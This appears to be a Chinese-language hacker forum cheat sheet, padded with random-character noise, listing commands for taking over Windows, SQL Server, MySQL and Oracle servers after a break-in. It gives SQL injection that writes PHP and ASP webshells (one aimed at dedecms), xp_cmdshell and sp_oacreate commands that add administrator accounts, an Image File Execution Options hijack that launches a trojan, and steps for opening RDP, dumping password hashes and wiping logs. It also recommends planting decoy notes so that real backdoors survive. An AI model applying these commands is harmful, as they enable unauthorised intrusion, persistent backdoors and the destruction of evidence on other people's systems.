+ ~" _" i, J- m* A5 B* L( J( X
1.net user administrator /passwordreq:no
9 u5 q- N* z7 I! T( t' e! f这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
- n0 f7 B& z4 T( r! m8 i2.比较巧妙的建克隆号的步骤 i$ f( B5 n( E5 H
先建一个user的用户
2 ?! p" N% N* N! K然后导出注册表。然后在计算机管理里删掉
. p9 _" `2 \' `" M; T2 L8 x' c在导入,在添加为管理员组
m5 u) e! [% n, x/ S x& ?3.查radmin密码) R" a" h5 r, r
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
/ ^% a, F; A1 ]4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options] Z4 i, L( m: t6 c# x+ K' k3 X
建立一个"services.exe"的项1 L$ m. w, q6 U: j r( @! G
再在其下面建立(字符串值)1 o; m8 |- d7 j9 p/ f8 W$ B
键值为mu ma的全路径' E: e* i" I1 v2 b8 x* b- E1 m
5.runas /user:guest cmd8 |( m4 r$ m9 x% i7 N& ]
测试用户权限!5 \ |9 n6 j3 H7 M" b) Z
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?/ e; H$ y& |8 i# F! `$ u
7.入侵后漏洞修补、痕迹清理,后门置放:
- W7 k( w+ }3 l6 `) Q基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
8 ~8 C7 X1 f [, J$ M ~5 V( `8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
. q# c* ~& `( a( W1 Q
" Y! h ?3 \4 o% B5 B4 Tfor example* N0 I2 k7 y9 D: p g
+ J" i2 v5 f( ?2 W* m/ L
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'; @# _$ Q/ p' v v0 X
4 v* C" M% ?6 z* l( v1 Pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'5 R4 Q U. k& ?1 e0 q/ E
$ p4 B T+ W6 B) i: t! I3 F9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
b- J2 V. w5 ?+ L9 o如果要启用的话就必须把他加到高级用户模式
- Q: _0 ]; l/ c7 U2 x可以直接在注入点那里直接注入! G8 L* y8 P# W/ ~ Q3 }
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
4 d' W, R" W z7 Z然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--6 d5 }/ U* |" m- y: v6 u% @6 Q, I
或者
+ A+ n% Q( D/ C: k4 ]3 ]sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'* _! }" i5 j) N( {4 G3 B3 V& `
来恢复cmdshell。
% _* G4 A% V' W( Z. t/ d8 _/ V" E, [! A7 M
分析器% C7 L# ?, M7 q4 _3 Q
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--! J4 G! \, ]4 K
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")8 U1 O5 C4 z9 J7 \
10.xp_cmdshell新的恢复办法
$ j3 E3 s; n) ? Q1 ~' Cxp_cmdshell新的恢复办法; m: |6 n4 v1 ^/ b3 r
扩展储存过程被删除以后可以有很简单的办法恢复:
4 Q& O' C1 p. T: ~删除0 o8 p3 @+ O7 t0 A- G
drop procedure sp_addextendedproc
8 v8 c( C5 g N* W% X* T0 udrop procedure sp_oacreate5 b1 V, Y: L6 p/ A8 m2 I
exec sp_dropextendedproc 'xp_cmdshell'9 A; c# O' Z2 Y4 N8 B. F5 b
4 w9 e# z0 i; I' m2 M
恢复) U+ Q2 L' b. F# v, |: {+ L
dbcc addextendedproc ("sp_oacreate","odsole70.dll")2 h X" T$ s3 c% ? {: r% a0 P- m! w
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")7 _9 o2 y% i6 v6 Z1 X) a
# |% ~2 f: |0 [0 _: R
这样可以直接恢复,不用去管sp_addextendedproc是不是存在, B8 o& J2 w- b
p9 u1 ?9 D7 A-----------------------------
( A& c0 Q" ]5 ]
+ D8 V+ c- X. a& P; p! d8 {! G删除扩展存储过过程xp_cmdshell的语句:
; f( {9 s& E% s4 qexec sp_dropextendedproc 'xp_cmdshell'
' i* ~ c/ M' q$ [0 h4 _) k; ]8 U- r1 @
! {% W' M# [+ l( l- I( f b恢复cmdshell的sql语句$ L0 y5 I$ E: T. s/ B, |( f! h U
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'% [9 f# V2 z" j/ n/ H
1 y h0 v: Q3 z& g; m$ j# c( D$ y$ _* G# ^/ D" B1 n
开启cmdshell的sql语句
2 L; I7 H9 ]6 u+ B6 _! R; X8 h
3 G2 A% L" m% t2 L. X# q; [% kexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'& D3 m7 e/ b, D
/ f/ ^. @; i/ j' x6 s+ s判断存储扩展是否存在
7 f, s" e, T' g( Iselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
& C/ k* i8 o0 V* O4 R返回结果为1就ok
8 J4 q! o2 h3 e
* \8 ^! {4 b* t恢复xp_cmdshell
. l& D( r5 V# v& T |exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'7 a. C0 k) ~! ?. \5 {' W' I) B
返回结果为1就ok5 G# A$ f$ y8 a7 I$ {
/ t. Z4 i( n' k
否则上传xplog7.0.dll! n; |" @; a( ?: `6 n
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll') Y' `4 K0 P4 j% d
; q% @5 c0 K, |) C! j* o
堵上cmdshell的sql语句
9 L2 d7 b' l! esp_dropextendedproc "xp_cmdshel1 `. l8 ?, e) m% n' E$ ?
-------------------------3 {3 b; S. z1 U4 ~; x' |
清除3389的登录记录用一条系统自带的命令:" |0 x3 d" Z6 w; u. e9 _ q. A
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f; V( P$ ~+ r) Q1 l9 E
# D2 H" v/ E8 v/ j! o' O) t然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件; A1 R0 S( m: H! w/ j& \
在 mysql里查看当前用户的权限" G, ~8 g& ?1 g0 k+ a; w
show grants for & d; v3 o; }! O0 h
' t: S5 y& t2 f- n以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
M+ t& I) W! {2 z& q8 P, U" M, R* j7 ]$ ?' V
$ P, j- ]9 h y% E% r* l( z
Create USER 'itpro'@'%' IDENTIFIED BY '123';" g3 a, Q6 ?9 q% F2 U7 _( x- \
' C0 y& p _ s! F
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION) A* J( T) s2 _1 U) D
6 H2 z; v" c0 y# O& m
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0& y' \ U) ]6 @: ~% s1 G
: M, n/ G/ ~ c+ b% e
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
: c. O. m. `5 |7 B* q
* ] o; s1 T: V1 F' z, {3 @搞完事记得删除脚印哟。4 T/ h9 K& V8 n8 i c9 |3 _; @
8 n, q* o8 b9 j1 q( b9 c& G
Drop USER 'itpro'@'%';
7 B) Y j7 _: ` e$ G: b- }# o1 d+ b3 I) B2 v+ Z7 J* d
Drop DATABASE IF EXISTS `itpro` ;
3 t5 s0 e# P: [+ A- P& q: w8 Q% U# j9 ^0 Y
当前用户获取system权限
/ z7 k/ X* M3 i U+ o/ O" `& F' tsc Create SuperCMD binPath= "cmd /K start" type= own type= interact8 |# Y# t5 t( [! s V, u6 q9 m/ J
sc start SuperCMD, |: F4 Y4 @! W( V" O" W3 ~2 x
程序代码( ~8 o/ s) W/ s. L
<SCRIPT LANGUAGE="VBScript">; [4 Z7 @6 L* y/ j8 ]1 r
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
4 E4 A R, }" n/ p6 l0 ?) }os="WinNT://"&wsnetwork.ComputerName
( Z; Y: _* G. K* G7 \Set ob=GetObject(os)% ^4 Q) R* b- \$ X8 p
Set oe=GetObject(os&"/Administrators,group"): L/ V3 k: ^; J+ ~" ?
Set od=ob.Create("user","nosec")
2 A& W7 U/ D+ e& S, M' god.SetPassword "123456abc!@#": k' R- {1 s. n' r3 ^$ O
od.SetInfo
' Q$ p: q5 u. k. i# s+ H8 L8 t" ^! VSet of=GetObject(os&"/nosec",user)
" | ^- c7 c/ ]2 _% s( yoe.add os&"/nosec"2 x7 L q$ R m+ T: t+ t3 a
</Script>
$ |6 ]+ ?# ~; x8 g: ~( U<script language=javascript>window.close();</script>: w/ J' I2 A8 U
' K) \/ b. t3 |1 @) J; l
! {( L& k3 ~* @+ e% s
. Z% I2 z: m$ e6 l# ~* Y4 d, [6 e4 K/ N
突破验证码限制入后台拿shell1 _& t0 A" G2 }" x" D
程序代码
0 ?+ m" O# o$ a2 m) }+ D6 `, N+ lREGEDIT4 / b6 V+ {. a* e3 p; l0 z6 E L
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 1 z# ]9 M5 h% k
"BlockXBM"=dword:000000003 P1 t% M) w, m
6 R- ]* S0 B7 Z* ~2 \ I6 p
保存为code.reg,导入注册表,重器IE
7 k# ]" K6 h: w* { ~1 X7 c7 g }就可以了
( \$ H# y" ~# v( d I3 M& l' u5 hunion写马3 ]! }9 H: j& z" F- g7 p2 g/ _
程序代码2 K S- `$ D# E- i2 @
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*: e5 \, ?1 i: Z h) ^ f) g0 s
" G7 l3 c7 n& m; Y6 j- P' }4 \应用在dedecms注射漏洞上,无后台写马/ ^! T3 e6 S% r/ S7 k# n9 ~( t
dedecms后台,无文件管理器,没有outfile权限的时候
) ]5 ?+ p' J9 Y! \在插件管理-病毒扫描里4 p7 T5 z, m; P8 a# x
写一句话进include/config_hand.php里2 K4 w: c2 ? \5 q: Y9 c" i
程序代码
9 [- K* l& e0 e3 T>';?><?php @eval($_POST[cmd]);?>
3 u4 l& I4 v# c6 \* c ~
$ o0 K; I2 r, Q9 }; x. p% q5 r: E) W9 m |
如上格式
$ J+ N* S# y; k& H. N6 D! ~' e4 r8 t; g
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
0 J! Y- l7 [! c7 N- H) S程序代码+ @9 L, v) w$ v: ^) v
select username,password from dba_users;3 k8 F9 \- K5 m! c
) e, J5 f7 R/ U* K8 Y) h
7 }9 A! B5 }/ [' x1 I; s- C0 Rmysql远程连接用户9 i* e- N* f8 ^- |# z6 _6 A
程序代码
& m2 L0 O9 ^! |3 v' S- R
# ~0 L, _1 r1 q0 C4 J4 x8 hCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';1 _4 a; B" X4 g9 z- r u2 s
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION, S2 A7 c. D8 C9 F# ~/ m* y o
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0# N( S+ h2 r! ^1 R9 V1 n" K
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;- O+ Y) a' M8 N3 I
7 `7 u) S9 ?0 c- b" z
1 \. N, |6 M4 F5 r6 T" a7 ^9 L
+ p& c: e3 t- e$ G' m/ b" o7 ~
4 i7 y0 V3 S5 K' Becho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
% F. Z- A8 X. \* n! X$ r1 N! d
4 t0 q! z j/ v# O+ R! {) t1.查询终端端口
. T5 P# d4 ^3 n8 @
# Y: x: P! U- m( l- [5 U/ dxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber9 w; B" n, H; u' s& ]& [
; k, \, B9 ]8 Z; \* s0 [* C通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"9 ^1 }. L) E9 }
type tsp.reg
) e3 }" J# h- W( m
) E9 l. U' g& U1 _* V& g2.开启XP&2003终端服务9 a2 O" m$ W7 |; r: I- x
. v3 d& c0 O& I6 A y
+ G" w- e$ M' O" I4 O: ZREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f7 ^/ ?* O. f( f* \: O) x
0 _# w0 i' B4 J
A* d$ R% m5 W2 y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f2 ] l& C" `+ G: f5 _4 y4 i
, J, G9 s1 x/ r# A
3.更改终端端口为20008(0x4E28) _; E4 v6 E( M5 S% T! l8 H$ I8 u
9 H* b/ }0 R' h2 B2 [( s
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
( R7 h7 ]* H0 p8 Z6 @" P. q% ^$ z# o8 W( _/ a: h! R4 ^4 b
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f2 ~' p% s! Q+ ?) Z) M5 }% C3 t( R: P
; U4 u. A6 m9 _* S* m4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
4 ?9 u3 @& D" ^9 A! k! m
. f. b T. x( p3 ]6 s8 r- a! F" SREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f: \: F: O& o0 h" v4 k. K
+ w; [ N8 S$ d& U* e/ @1 B
; b1 C5 j: W7 n' {9 M5.开启Win2000的终端,端口为3389(需重启)- s7 a- B5 |! Z$ p, {$ c" a3 p
1 A8 V3 Y, \3 \$ A5 I5 S9 a
echo Windows Registry Editor Version 5.00 >2000.reg , B6 l b1 @, x! O( S$ ~: M, z: `
echo. >>2000.reg7 h; [8 F U: _, I
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
6 m7 L" v9 c$ J! c2 a2 A3 o$ w; Qecho "Enabled"="0" >>2000.reg . y0 W$ H8 p2 Q J+ r/ Q5 k! o3 E
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg $ e4 z5 W5 |2 }# b/ L* \
echo "ShutdownWithoutLogon"="0" >>2000.reg 5 z3 k# a5 J2 b) W4 j" D' }
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
; P+ U( n3 l! j+ @& |( h( zecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
* U h- K& W1 D2 g( L: E/ x, necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
5 e z) J( |& wecho "TSEnabled"=dword:00000001 >>2000.reg 4 s; L. x. f6 u( ]( Q( g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg - S! q; |8 S" ?3 P, m$ r5 ?
echo "Start"=dword:00000002 >>2000.reg . A, w. v3 _3 O3 j4 Z0 {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg ) _- n& U& e- z' l$ K4 r
echo "Start"=dword:00000002 >>2000.reg + m) O8 W$ _5 `' `! G
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg # U# }5 R2 t8 k( G& i
echo "Hotkey"="1" >>2000.reg
" A+ V' {5 P" z3 H" T3 Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
+ I4 N2 G/ g' Z. U: Aecho "ortNumber"=dword:00000D3D >>2000.reg
. w! k r9 h9 }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 2 C# T* X" Z1 W6 v
echo "ortNumber"=dword:00000D3D >>2000.reg
' H$ J; q8 {! A$ ?- P X: t/ C
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
: H' V+ k: ^9 S2 }) Y
) z$ Y0 t4 B. T1 Y* [@ECHO OFF & cd/d %temp% & echo [version] > restart.inf v6 b$ ~6 p5 I6 o/ {
(set inf=InstallHinfSection DefaultInstall)
5 {% u# D9 ]5 zecho signature=$chicago$ >> restart.inf
) `0 K. k; D0 x2 A3 M, t/ recho [defaultinstall] >> restart.inf
7 B9 f" ^2 K4 l zrundll32 setupapi,%inf% 1 %temp%\restart.inf5 c. a9 H" r' s
' m+ p# }& P, [ {6 `2 q
9 R, z; A, x7 F" w7.禁用TCP/IP端口筛选 (需重启)+ i w6 _* d+ D' ~' I
% O# O8 C% q9 ]% ^, z9 K' h
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
6 M: v' |7 {. {6 z7 Y
: g* X+ C' T) t- N5 ?; d, M1 }8.终端超出最大连接数时可用下面的命令来连接
7 O! O5 ]& W# a& b9 ]: D7 w+ i' H8 N6 f2 O
mstsc /v:ip:3389 /console0 q* C# L* m4 d$ i/ }
% R1 X* c7 W% K) X
9.调整NTFS分区权限
' l$ w& i! @6 v6 b- L( a- Y2 b6 p: Y, g/ ~8 S4 p" [
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
- k+ a1 O: Y6 \9 Z+ g# {4 T* ~; w3 A7 p7 J) S& f
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)1 E. d' K, t' L* Y% ]1 r
$ V$ B/ a& |. b1 Q1 |* B
------------------------------------------------------
1 s' n! n1 W2 |$ ? e) @3389.vbs
5 I* W! y3 d bOn Error Resume Next
- ?8 D" o2 b w1 T) ?% Aconst HKEY_LOCAL_MACHINE = &H800000024 C' I3 V' W- @8 L. l2 _
strComputer = "."0 G J3 s: f3 U3 e$ ~# X9 [8 a
Set StdOut = WScript.StdOut
0 y4 B( b O9 Y: ^$ ^, gSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_5 X+ Z# V7 x4 ?' Q$ h
strComputer & "\root\default:StdRegProv")
% g% ]3 |! ]6 N. ~$ _3 rstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
8 B) ~ V, P5 V D7 foreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' i7 B/ b: J8 @! x- g6 SstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"( ^5 i2 O2 B/ A0 i/ F* K+ T
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
% [ L) }, z5 @$ |. O; ^9 DstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp". F& Q7 F' x U: V7 P2 \
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server": U1 W" S$ O w+ k
strValueName = "fDenyTSConnections"
1 p4 i: Y8 x* \dwValue = 0/ S" Q/ s" J1 P
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue; u7 q5 i' s9 g& O9 g
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"$ D8 s# s# P; z g r
strValueName = "ortNumber"
1 x. p$ t \6 v6 f5 @1 GdwValue = 3389# u+ |; V; T, _; \0 e, w
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue) l7 [% h. X" \9 y* H
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"0 e" @; s4 @0 ?0 P3 t' U# C
strValueName = "ortNumber"
# u2 {# m5 U8 d+ SdwValue = 3389. X# m# P1 r5 Z( M! ^
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue q/ I8 x6 a/ ^
Set R = CreateObject("WScript.Shell")
4 M0 o; q1 ]- J1 D: ^8 i/ ~R.run("Shutdown.exe -f -r -t 0")
3 Y% n$ p" J' d2 H0 T1 s2 ]4 y& o' f) y, m9 F! e3 @- |
删除awgina.dll的注册表键值
$ J0 A- z# k" p- s) ?$ e程序代码, `) f7 W4 i+ u; {7 U& I
+ f+ l5 |% b1 g+ R$ Y2 Vreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f5 c8 K6 p3 m' F) k( G
/ j( s' a9 F, c5 X( @4 t4 _
+ V/ Q7 d- Y1 F! d/ Q m. Y! V6 D4 A5 {
9 C$ ^( Y) J% C
程序代码! D! h. @& |7 A8 D4 t9 j* @" \
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
# r9 v9 R3 E" |: u( @9 ?7 r, T& V6 q
设置为1,关闭LM Hash
( n5 ]" C( p# A ^: g# d' B c# I- X( U2 e& L4 E
数据库安全:入侵Oracle数据库常用操作命令+ ~/ j6 q" _8 \8 a
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
1 z( _: m7 E ^1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。# f( h" Y% F8 v7 d. i( f% ^
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
. |/ i2 |% ?# J3、SQL>connect / as sysdba ;(as sysoper)或 B4 ~* h: f& ~! |
connect internal/oracle AS SYSDBA ;(scott/tiger)
* t! `6 ?* |6 O7 w0 {/ tconn sys/change_on_install as sysdba;
) F0 g5 O7 f- G4、SQL>startup; 启动数据库实例; i9 }0 ] t2 J/ S6 c
5、查看当前的所有数据库: select * from v$database;
6 R1 R M4 ]; D4 v+ s9 kselect name from v$database;
, ?6 n$ t1 z% P* ?! K6、desc v$databases; 查看数据库结构字段
9 W4 O8 b" x* r6 R, s; X7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
. P# m: `# l6 W1 _% C- D; {SQL>select * from V_$PWFILE_USERS;
$ R6 s; X- k. \9 ?& [2 \/ z* f2 }) ~Show user;查看当前数据库连接用户# r0 |6 r: D+ u1 G
8、进入test数据库:database test;9 u( N1 m( Z! M+ s) H: R' ~
9、查看所有的数据库实例:select * from v$instance;
$ d G. s D+ J7 @4 w- \$ ]5 {如:ora9i
- Q- M5 d4 `- P9 f1 q: o( W- K4 t10、查看当前库的所有数据表:8 [+ Z! N3 c) S3 T) B
SQL> select TABLE_NAME from all_tables;
# a% S* ~- M& \+ _: M! Mselect * from all_tables;5 f6 v3 ^, B) b9 [
SQL> select table_name from all_tables where table_name like '%u%';
6 }$ m1 _5 \3 x6 KTABLE_NAME2 u- C, o, s* V( C
------------------------------
; d/ w! Z+ @; i4 w" X3 U8 @_default_auditing_options_( e) T. J6 @7 B( Y2 |
11、查看表结构:desc all_tables;
3 J7 K4 @. P! X4 [( }/ A12、显示CQI.T_BBS_XUSER的所有字段结构:
8 I* k8 S' o- ^0 Vdesc CQI.T_BBS_XUSER;
. I$ M) v' y Y% ~* n0 h* P/ D13、获得CQI.T_BBS_XUSER表中的记录:: R. A" E" b9 i! Z% Z& x3 J
select * from CQI.T_BBS_XUSER;* i! _ ~" A, G
14、增加数据库用户:(test11/test) D/ U5 B! Z, {% p2 z% W6 L
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
! d8 z9 z0 X C2 _( ^15、用户授权:
8 K8 T) } D Q0 [' I6 U) E2 Vgrant connect,resource,dba to test11;
j" S+ f; l" `2 P6 K0 n4 o" Tgrant sysdba to test11;. m3 M% n# ~! Z
commit;
8 ~1 Z2 w. a1 Q2 f. Q0 |" t3 i16、更改数据库用户的密码:(将sys与system的密码改为test.)
; G1 I# n g$ C6 p# ualter user sys indentified by test;
" W, B& V/ c* U2 d& salter user system indentified by test;
8 L+ r7 j7 M9 f, H' t7 v4 J
+ e" H7 Q, X' k A) M" XapplicationContext-util.xml* Z% B, U! y8 f# }& E( k5 e8 r
applicationContext.xml% ? N' F4 @9 E% s. h' }. U% c" `$ D
struts-config.xml2 r, M9 K& N8 o4 ~! S" q
web.xml
' V; B) W+ v3 y5 |! D" |+ U4 Mserver.xml" d8 W l3 t! \- s) h
tomcat-users.xml
$ z4 y3 s$ X7 i* Q/ Shibernate.cfg.xml8 j9 j8 ~. v7 a) z
database_pool_config.xml- O5 }4 ~$ M% h8 S$ w5 J4 h9 Y, L3 J
( s4 a# p8 j' x
2 j0 B0 x# `$ I: f9 a9 v\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
' v) S* e2 p, V3 ]' }\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
1 d! z! }0 V7 @' I\WEB-INF\struts-config.xml 文件目录结构
. M D' F! V. W2 I3 |, \. u- U3 t' U; {- O2 s. Y& I V9 K) G5 Z
spring.properties 里边包含hibernate.cfg.xml的名称
3 D( I$ H% u% M: }
5 C0 w# Z! |# ], m6 u
7 I+ s% \+ [. {3 S+ iC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
( N+ b0 ~6 b& G( B! K% E8 B5 U a5 F' n* G8 B I0 E
如果都找不到 那就看看class文件吧。。
6 g( s7 @% r+ q- X" D, |6 P. K1 _3 O$ {" p; e* R7 {& @; l
测试1:# ]# p+ k' q$ e! y# @/ C2 \
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t15 }6 m" _6 {4 V# w
1 O' e; v3 M! i/ ^2 ]' V
测试2:
' L7 |" j% O1 ?' G
8 G1 b7 `7 K/ f- e* V5 u* @8 p3 R2 Lcreate table dirs(paths varchar(100),paths1 varchar(100), id int): Y' D1 e K9 \
* P! \; Q9 P8 R6 b: X7 s: D
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
) G% W0 L- Y; {9 v* p- ]: _0 B8 V* E
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
9 f4 C/ y. R0 r6 g% o7 e$ Z$ Q
4 ]9 _6 Y8 w" K# \4 q查看虚拟机中的共享文件:! B, I3 h/ \* Y0 _+ Y
在虚拟机中的cmd中执行 b4 X" |3 I4 @+ {5 n5 V% N
\\.host\Shared Folders! w0 X) `" L' u j
/ K5 H; [* O2 C8 C1 F4 n0 W
cmdshell下找终端的技巧- R6 {) L C2 B8 v- N
找终端: # a' X3 p0 y2 c4 K8 ]6 K
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! # u3 s! B0 ?7 K z; Q. W
而终端所对应的服务名为:TermService 3 O1 J/ s! z/ E& n$ {! m- [
第二步:用netstat -ano命令,列出所有端口对应的PID值! " Q1 l2 h: c5 O0 S4 V7 r4 D! O' v5 E
找到PID值所对应的端口* m3 Y7 T. _0 } O
C; S+ A! c! A0 K: _3 D; D
查询sql server 2005中的密码hash
3 F g( Z! i! f7 CSELECT password_hash FROM sys.sql_logins where name='sa'# y& W" g1 X0 L
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
) w0 Y5 U! D) Y/ K1 @" ~access中导出shell
2 m( S* V- j2 B3 L# M( w9 g7 ^
. g+ ^6 J7 t& N1 _; q) k+ R中文版本操作系统中针对mysql添加用户完整代码:( n* Z/ D; ]9 q: ~: l
